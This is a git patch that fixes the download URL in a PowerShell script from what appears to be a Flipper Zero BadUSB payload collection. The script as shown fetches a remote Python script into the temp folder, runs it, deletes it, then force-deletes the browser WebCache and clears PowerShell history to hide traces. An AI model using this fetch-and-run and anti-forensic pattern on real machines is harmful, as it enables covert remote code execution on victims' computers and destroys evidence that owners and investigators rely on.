From e38e4fde189438bded205ee2fb350437a4cb2c03 Mon Sep 17 00:00:00 2001 From: Tom_gxz <75934344+tomgxz@users.noreply.github.com> Date: Sun, 21 Jul 2024 18:17:36 +0100 Subject: [PATCH] Fixed script URL --- .../Execution/CloseAllApplications_Windows/close_all_app.ps1 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Windows/Execution/CloseAllApplications_Windows/close_all_app.ps1 b/Windows/Execution/CloseAllApplications_Windows/close_all_app.ps1 index 1a6ab96..6ca8a17 100644 --- a/Windows/Execution/CloseAllApplications_Windows/close_all_app.ps1 +++ b/Windows/Execution/CloseAllApplications_Windows/close_all_app.ps1 @@ -1,5 +1,5 @@ # Download Python script -$scriptUrl = "https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/CloseAllApplications_Windows/script.py" +$scriptUrl = "https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/Windows/Execution/CloseAllApplications_Windows/script.py" $savePath = "$env:temp\script.py" (New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath) @@ -13,4 +13,4 @@ Remove-Item $savePath Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force # Clear the PowerShell command history -Clear-History \ No newline at end of file +Clear-History